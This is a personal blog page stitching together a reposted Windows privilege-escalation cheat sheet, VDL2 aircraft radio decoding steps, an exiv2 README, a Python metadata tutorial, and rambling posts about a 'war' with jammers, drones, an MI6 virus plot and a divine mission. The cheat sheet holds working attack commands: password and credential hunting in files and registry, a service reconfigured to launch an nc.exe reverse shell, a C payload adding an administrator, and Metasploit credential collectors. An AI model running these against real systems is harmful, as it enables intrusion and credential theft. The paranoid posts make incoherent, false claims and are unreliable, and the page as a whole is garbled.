Thursday, May 17, 2018

here I am...on my poor bastard life

Privilege Escalation Windows

We now have a low-privileges shell that we want to escalate into a privileged shell.

Basic Enumeration of the System

Before we start looking for privilege escalation opportunities we need to understand a bit about the machine. We need to know what users have privileges. What patches/hotfixes the system has.

# Basics
systeminfo
hostname

# Who am I?
whoami
echo %username%

# What users/localgroups are on the machine?
net users
net localgroups

# More info about a specific user. Check if user has privileges.
net user user1

# View Domain Groups
net group /domain

# View Members of Domain Group
net group /domain 

# Firewall
netsh firewall show state
netsh firewall show config

# Network
ipconfig /all
route print
arp -A

# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn

Cleartext Passwords

Search for them

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*

In Files

These are common files to find them in. They might be base64-encoded. So look out for that.

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini

In Registry

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Service only available from inside

Sometimes there are services that are only accessible from inside the network. For example a MySQL server might not be accessible from the outside, for security reasons. It is also common to have different administration applications that is only accessible from inside the network/machine. Like a printer interface, or something like that. These services might be more vulnerable since they are not meant to be seen from the outside.

netstat -ano

Example output:

Proto  Local address      Remote address     State        User  Inode  PID/Program name
    -----  -------------      --------------     -----        ----  -----  ----------------
    tcp    0.0.0.0:21         0.0.0.0:*          LISTEN       0     0      -
    tcp    0.0.0.0:5900       0.0.0.0:*          LISTEN       0     0      -
    tcp    0.0.0.0:6532       0.0.0.0:*          LISTEN       0     0      -
    tcp    192.168.1.9:139    0.0.0.0:*          LISTEN       0     0      -
    tcp    192.168.1.9:139    192.168.1.9:32874  TIME_WAIT    0     0      -
    tcp    192.168.1.9:445    192.168.1.9:40648  ESTABLISHED  0     0      -
    tcp    192.168.1.9:1166   192.168.1.9:139    TIME_WAIT    0     0      -
    tcp    192.168.1.9:27900  0.0.0.0:*          LISTEN       0     0      -
    tcp    127.0.0.1:445      127.0.0.1:1159     ESTABLISHED  0     0      -
    tcp    127.0.0.1:27900    0.0.0.0:*          LISTEN       0     0      -
    udp    0.0.0.0:135        0.0.0.0:*                       0     0      -
    udp    192.168.1.9:500    0.0.0.0:*                       0     0      -

Look for LISTENING/LISTEN. Compare that to the scan you did from the outside.
Does it contain any ports that are not accessible from the outside?

If that is the case, maybe you can make a remote forward to access it.

# Port forward using plink
plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l  -p  -r 
portfwd add -l 3306 -p 3306 -r 192.168.1.101

So how should we interpret the netstat output?

Local address 0.0.0.0
Local address 0.0.0.0 means that the service is listening on all interfaces. This means that it can receive a connection from the network card, from the loopback interface or any other interface. This means that anyone can connect to it.

Local address 127.0.0.1
Local address 127.0.0.1 means that the service is only listening for connection from the your PC. Not from the internet or anywhere else. This is interesting to us!

Local address 192.168.1.9
Local address 192.168.1.9 means that the service is only listening for connections from the local network. So someone in the local network can connect to it, but not someone from the internet. This is also interesting to us!

Kernel exploits

Kernel exploits should be our last resource, since it might but the machine in an unstable state or create some other problem with the machine.

Identify the hotfixes/patches

systeminfo
# or
wmic qfe get Caption,Description,HotFixID,InstalledOn

Python to Binary

If we have an exploit written in python but we don't have python installed on the victim-machine we can always transform it into a binary with pyinstaller. Good trick to know.

Scheduled Tasks

Here we are looking for tasks that are run by a privileged user, and run a binary that we can overwrite.

schtasks /query /fo LIST /v

This might produce a huge amount of text. I have not been able to figure out how to just output the relevant strings with findstr. So if you know a better way please notify me. As for now I just copy-paste the text and past it into my linux-terminal.

Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another privileged user.

cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM

Change the upnp service binary

sc config upnphost binpath= "C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""

Weak Service Permissions

Services on windows are programs that run in the background. Without a GUI.

If you find a service that has write permissions set to everyone you can change that binary into your custom binary and make it execute in the privileged context.

First we need to find services. That can be done using wmci or sc.exe. Wmci is not available on all windows machines, and it might not be available to your user. If you don't have access to it, you can use sc.exe.

WMCI

wmic service list brief

This will produce a lot out output and we need to know which one of all of these services have weak permissions. In order to check that we can use the icacls program. Notice that icacls is only available from Vista and up. XP and lower has cacls instead.

As you can see in the command below you need to make sure that you have access to wimc, icaclsand write privilege in C:\windows\temp.

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

Binaries in system32 are excluded since they are mostly correct, since they are installed by windows.

sc.exe

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt

FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt

FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt

FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

Now you can process them one by one with the cacls command.

cacls "C:\path\to\file.exe"

Look for Weakness

What we are interested in is binaries that have been installed by the user. In the output you want to look for BUILTIN\Users:(F). Or where your user/usergroup has (F) or (C) rights.

Example:

C:\path\to\file.exe 
BUILTIN\Users:F
BUILTIN\Power Users:C 
BUILTIN\Administrators:F 
NT AUTHORITY\SYSTEM:F

That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.

Here is a POC code for getsuid.

#include 
int main ()
{
int i;
    i = system("net localgroup administrators theusername /add");
return 0;
}

We then compile it with mingw like this:

i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe

Restart the Service

Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using wmic or net the following way:

wmic service NAMEOFSERVICE call startservice

net stop [service name] && net start [service name].

The binary should now be executed in the SYSTEM or Administrator context.

Migrate the meterpreter shell

If your meterpreter session dies right after you get it you need migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this:

wmic process list brief | find "winlogon"

So when you get the shell you can either type migrate PID or automate this so that meterpreter automatically migrates.

http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html

Unquoted Service Paths

Find Services With Unquoted Paths

# Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

# Using sc
sc query
sc qc service name

# Look for Binary_path_name and see if it is unquoted.

If the path contains a space and is not quoted, the service is vulnerable.

Exploit It

If the path to the binary is:

c:\Program Files\something\winamp.exe

We can place a binary like this

c:\program.exe

When the program is restarted it will execute the binary program.exe, which we of course control. We can do this in any directory that has a space in its name. Not only program files.

This attack is explained here:
http://toshellandback.com/2015/11/24/ms-priv-esc/

There is also a metasploit module for this is: exploit/windows/local/trusted_service_path

Vulnerable Drivers

Some driver might be vulnerable. I don't know how to check this in an efficient way.

# List all drivers
driverquery

AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

http://toshellandback.com/2015/11/24/ms-priv-esc/

Group Policy Preference

If the machine belongs to a domain and your user has access to System Volume Information there might be some sensitive files there.

First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the environment-variables

# Output environment-variables
set

# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=WHATEVER.LOCAL

# Look up ip-addres
nslookup nameofserver.whatever.local

# It will output something like this
Address:  192.168.1.101

# Now we mount it
net use z: \\192.168.1.101\SYSVOL

# And enter it
z:

# Now we search for the groups.xml file
dir Groups.xml /s

If we find the file with a password in it, we can decrypt it like this in Kali

gpp-decrypt encryptedpassword

Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes

Escalate to SYSTEM from Administrator

On Windows XP and Older

If you have a GUI with a user that is included in Administrators group you first need to open up cmd.exefor the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do Run as Administrator you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from c:\windows\system32\cmd.exe. This will give you a cmd with Administrators rights.

From here we want to become SYSTEM user. To do this we run:

First we check what time it is on the local machine:

time

# Now we set the time we want the system CMD to start. Probably one minuter after the time.
at 01:23 /interactive cmd.exe

And then the cmd with SYSTEM privs pops up.

Vista and Newer

You first need to upload PsExec.exe and then you run:

psexec -i -s cmd.exe

Kitrap

On some machines the at 20:20 trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute vdmaillowed.exe. I think it only works with GUI.

vdmallowed.exe
vdmexploit.dll

Using Metasploit

So if you have a metasploit meterpreter session going you can run getsystem.

Post modules

Some interesting metasploit post-modules

First you need to background the meterpreter shell and then you just run the post modules.
You can also try some different post modules.

use exploit/windows/local/service_permissions

post/windows/gather/credentials/gpp

run post/windows/gather/credential_collector 

run post/multi/recon/local_exploit_suggester

run post/windows/gather/enum_shares

run post/windows/gather/enum_snmp

run post/windows/gather/enum_applications

run post/windows/gather/enum_logged_on_users

run post/windows/gather/checkvm

https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

Privilege Escalation - Windows · Total OSCP Guide

Before we start looking for privilege escalation opportunities we need to understand a bit about the machine. We need to know what users have privileges. What patches/hotfixes the system has.

SUSHANT747.GITBOOKS.IO

Good morning !welcome back to war! Thursday, 08.25 am! I found "funny" the MI6 reccomendation on the Embassy site, saying to be careful with terrorism ( ...basic shit) and gastrointestinal diseases at Portugal!!!! (????) I just realized how stupid I am, that didn't immediately recognize the mice trap!!!! ...so let me explain to you...The enteroviruses ( are a family of viruses that usually enter the body by infecting the gastrointestinal * tract. ...one of them is ...coxsackievirus b that provokes myocarditis (heart inflammation) ....which provokes sudden heart arrest, from 2 to 10 hours...and the virus is undetectable because its replication is based on necrosis (the virus kills, eats, the virus) ...therefore...by a simple ingestion of the virus in food, what was a gastrointestinal common shit...will be the sudden death of the artist! And..."be careful while travelling to Portugal in holidays"

Wednesday, May 16, 2018

..back to war! So, about the subject "flight mode" counter attack...let's just begin by defining that air traffic use a different TCP/IP protocol like VDL 2...this is something they don't except...if our communications are made in an obsolete (we might say it like this) SDR receiver... they will stay without no way, as their jammers are looking for typical Bluetooth inside the wireless network, or RF microwave...of jamming this system...here's how to install

The VDL2 (for "VHF Data Link mode 2") mode permits automatic transmissions between planes and ground stations, with an exchange of different pieces of information (and especially positions) through AVLC frames (I, UI, RR, XID...) very close to Packet frames. It is a short distance (400 km maximum) service proposed through a network of VHF ground stations (on 136.975 MHz mainly but also 136.875 MHz in Europe). It gradually replaces the ACARS mode.

The simplest way to decode this mode is to directly demodulate 8PSK frames by MultiPSK, with a SDR receiver (FUNcube Dongle, for example) connected to MultiPSK and the SDR interface started (on the Configuration screen). Adjust the SDR frequency on 136963 kHz and the waterfall frequency on 12 kHz (making it 136.975 MHz).

Or adjust the SDR frequency on 136863 kHz and the waterfall frequency on 12 kHz (making it 136.875 MHz).
The I/Q PSK demodulation will be done by Multipsk, so as the decoding.

However, a standard USB receiver can be used (both solutions are equivalent from a performance point of view). In this case, the reception central frequency must be shifted by 12 KHz, i.e the frequency on the USB receiver must be adjusted to 136.963 MHz (136963 KHz instead 136975 KHz). Of course, the SDR interface on Multipsk must not be started.

The frequency must be very precisely adjusted (tolerance: +/50 Hz).

"end quote"

As of July 2016 the following 4 frequencies have been found to be active in Europe:

136.725 MHz dedicated to ARINC

136.775 MHz dedicated to SITA

136.875 MHz dedicated to SITA

136.975 MHz ARINC shared with SITA

Also see: https://ext.eurocontrol.int/WikiLink/index.php/ARINC

Connect the dongle to MultiPSK

RTL dongle specific settings

Setting the VDL2 Mode

Setting the frequency

Coarse frequency adjustment

Fine frequency adjustment

Connecting MultiPSK to Plane Plotter

http://planeplotter.pbworks.com/w/page/75894179/VDL%20mode%202

planeplotter / VDL mode 2

PLANEPLOTTER.PBWORKS.COM

tactical jammers position ..drones...

welcome back to war! So, dear friends, what's the important aspects to know about their projectiles send by cannons to disrupt communications ? 1. they send the jammers trough a tactical method which is "two coherent waves traveling along two different paths to the same point will interfere destructively" this means we have to detect two positions, inside their target area, that are sending radio signals, trough projectiles. 2. Do not forget, that this jammers are deployed by drones, and hot ballons 3 and most important, while we are under attack, put all electronic wireless under "flight mode"

ok, before we go to the "flight mode" counter attack..just to refer a detail, on this communication disruption; so, we are emitting a coherent radio frequency (between 20 and 2020 mgz) on two different locations, destiny for the same target, deployed by a drone. To be effective the disruption, based on Physics, is that between the two jamming signals, must have half distance of the wavelength, between them. So if , we deploy one, at 20 miles (for example), the other one, must be emitting at 10 miles distance

Tuesday, May 15, 2018

CODE IS ...

....A simple wrapper around exiv2...

A simple wrapper around the C++ Exiv2 libary for reading and writing image metadata.

See http://www.exiv2.org/

Requires that the exiv2 C++ library is installed.

Usage

gem install exiv2

if you get errors with header could not be found below:

exiv2.cpp:1:10: fatal error: 'exiv2/image.hpp' file not found
#include "exiv2/image.hpp"

please explicitly declare the header path

gem install exiv2 -- --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"

on OSX with Homebrew's exiv2, the EXIV2_PREFIX can be set:

export EXIV2_PREFIX=$(brew --prefix exiv2)

If you get this error while trying to install as part of a bundle install, you can set these paths using:

bundle config build.exiv2 --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"

If you are on new version of Command Line Tool (that is newer than 6.2, and bump into following error:

/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1/iterator:341:10: fatal error: '__debug' file not found
#include <__debug>

You can follow the quick hack by touching a new file /Library/Developer/CommandLineTools/usr/include/c++/v1/__debug with content:

#ifndef _LIBCPP_ASSERT
#define _LIBCPP_ASSERT(...) ((void)0)
#endif

Once everything is successfully installed, you can give it a go:

require 'exiv2'
image = Exiv2::ImageFactory.open("image.jpg")
image.read_metadata
image.iptc_data.each do |key, value|
  puts "#{key} = #{value}\n"
end
image.exif_data.each { ... }
image.xmp_data.each { ... }

iptc_data_hash  = image.iptc_data.to_hash
xmp_data_hash   = image.xmp_data.to_hash

image.exif_data.delete("Exif.Image.Software")
image.iptc_data.delete_all("Iptc.Application2.Keywords")

image.iptc_data["Iptc.Application2.Caption"] = "A New Caption"
image.iptc_data.add("Iptc.Application2.Keywords", "fishy")

image.write_metadata

envato/exiv2

A simple wrapper around exiv2

GITHUB.COM

welcome back...to war! "Not that I'm currently cruising for jobs with British intelligence or anything, but I happened upon (via Hacker News) this current coding challenge posted to the MI5 careers page...."

Prerequisites: Assuming you've already downloaded and installed Python, you should do two things. One: spend 10 minutes doing this "Hello, World" Python for non-programmers tutorial. Two: spend another five minutes doing this tutorial on using Python modules.

0.0) Install Pillow

The active version of PIL is actually known as Pillow, so this is what we need to install. You should do this with the Python package manager pip, which is covered in the second prerequisite tutorial above. Just:

pip install pillow

Now, create a new Python script in whatever text editor you like. I'm using Sublime Text, which is great. I called my script metaread.py.

1.0) Create an Image object

First thing we're going to do is actually bring in the Pillow module we installed, which is the first line below. Next, we need to create an object representation of our MI5 image, puzzle.png. This exposes the image and all of the things we can do with it via the Pillow module to our Python script. To see some more of these capabilities, check out Hack This: Edit an Image in Python.

from PIL import Image image = Image.open("water.png")

2.0) Extract the Exif data

Not all image formats contain Exif data. Mostly just JPGs. Which is fine because that's most pictures. The MI5's image is actually a .PNG file, which we'll have to handle somewhat differently. Let's do a quick JPG though.

There's really nothing to it. I create the image object as above then call the _getexif()function on it. In return, I get a dictionary data structure full of metadata.

The dictionary consists of tag-value pairs, which we can extract and view using a for-loop, like this. Note that I had to import some extra stuff at the top:

from PIL import Image from PIL.ExifTags import TAGS, GPSTAGS image = Image.open("gpsample.jpg") print(image) info = image._getexif() for tag, value in info.items(): key = TAGS.get(tag, tag) print(key + " " + str(value))

So, that just outputs all of the Exif data contained within a given image as a series of entries. It's hardly guaranteed to be the same for every image. I had to search online for a sample image containing GPS metadata because I got tired of scanning through everything on my computer trying to find an example (though it wouldn't be too hard to write a script that could comb through a file of images and automatically pull out those that do include it). In any case, you can find the same image here.

A sampling of the output:

GPSInfo {0: '\x00\x00\x02\x02', 1: u'S', 2: ((33, 1), (51, 1), (2191, 100)), 3: u'E', 4: ((151, 1), (13, 1), (1173, 100)), 5: '\x00', 6: (0, 1)} ISOSpeedRatings 100 ResolutionUnit 2 WhiteBalance 0 GainControl 0 BrightnessValue (100, 10)

2.1) Extract non-Exif data

Again, PNGs don't come with Exif data.

Don't panic. Just because it's not in Exif format doesn't mean that puzzle.png's metadata is all that more difficult to access.

It so happens that when an image is loaded per step 1.0, the PIL module will automatically load up a dictionary with whatever metadata it can id. We can barf it all out to the screen with a simple print statement:

print (image.info)

Or we can loop through it as in 2.0 as such:

for tag, value in info.items(): key = TAGS.get(tag, tag) print(key + " " + str(value))

Problem solved?

So, at this point I need to confess that this .info method is not actually returning all of the metadata from puzzle.png, and I don't quite know why. In addition to regular old Photoshop and the ExifRead Python tool mentioned above, I also tried four different online metadata extraction tools and only one was able to return a complete listing: Jeffrey Friedl's Image Metadata Viewer. Said viewer is based on a command-line tool called ExifTool, which I downloaded and ran. It too worked.

But I promised Python and Python we shall write. It's actually pretty easy to run a command-line program from within Python, but you'll still have to download the actual command line program, which is available here. Now, we can run this script on our image file, and the ExifTool will output the result via Python to the screen. Try it.

import os os.system('exiftool -h puzzle.png')

See the clue?

I don't know why it was so difficult to pull metadata from this file. It may have something to do with how metadata in PNG files is laid out. Within the file, metadata is kept in data structures called chunks. Chunks are given weird coded names that define, among other things, whether they should be considered "critical" or not. Critical chunks include actual image data, bit depth, and color palette. Not-critical chunks offer histograms, gamma values, default background colors, and, finally, text. There are three different types of text chunks all with a standard dictionary entry format. Each text entry has a name or title, and then some associated text. They can be user-defined, but there are some text field types that come predefined, such as "comment." Which in our MI5 file contains this:

https://motherboard.vice.com/en_us/article/aekn58/hack-this-extra-image-metadata-using-python

Hack This: Extract Image Metadata Using Python

What secrets are your JPGs hiding?

MOTHERBOARD.VICE.COM

Monday, May 14, 2018

back to war! so...who wants completely secure communications, and probable tv broadcast jammers ?

http://www.goscas.com/china-high_power_ka_band_point_to_point_microwave_antennas_dual_polarization-5650098.html

High Power KA Band Point to Point Microwave Antennas Dual Polarization

Quality Ka band Tx/Rx Satellite Antenna manufacturers & exporter - buy High Power KA Band Point to Point…

GOSCAS.COM

At 4 am ...I explained to my tribe who am I ...what are my powers...all of my Prophets have powers, that God will reveal when the time comes

Maybe I am semi Goddess ...I keep on saying to invisible Jesus my Lord, you better have a very special place for me in Paradise, since I'm being used by God, for some task and purpose I don't know what it is, and I'm not being payed!!!!! Maybe Jesus got my Mother pregnant, when she was for 3 years trying, picked my Mother specially for a truly Queen taste. And keep me here, using my rage, on a world that should have made me very very rich...keep me here poor and prisoner. Maybe Jesus architect this story, by making me, not a top model, but the most loved girl in the world...for a sexy look, that I had for years, (and still have) that its universal ; a sexy look, that Jesus carefully studied on Men's preferences....My natural talent for espionage...My gigant megalomania views. ...My realism ...my pure heart...my good intentions...and horrible revenges ....as we spoken , the phone ringed ...my Mother telling (us) the old men has a lottery in his pocket for me...didn't said how much or when he would give me...
we live in times, where computers are nano sized and can penetrate your skin. God has a task for me, for all my friends gather at my house. Jesus said.."if I told you , your actions in the future, you would change them" He downloaded me, tetra bytes of information...Jesus said to me what was our part, how the "war" will end...but He keeps the lottery ticket on His pocket, not saying how much and when He will give it to us.

Search Webcams:
by www.online-camera.de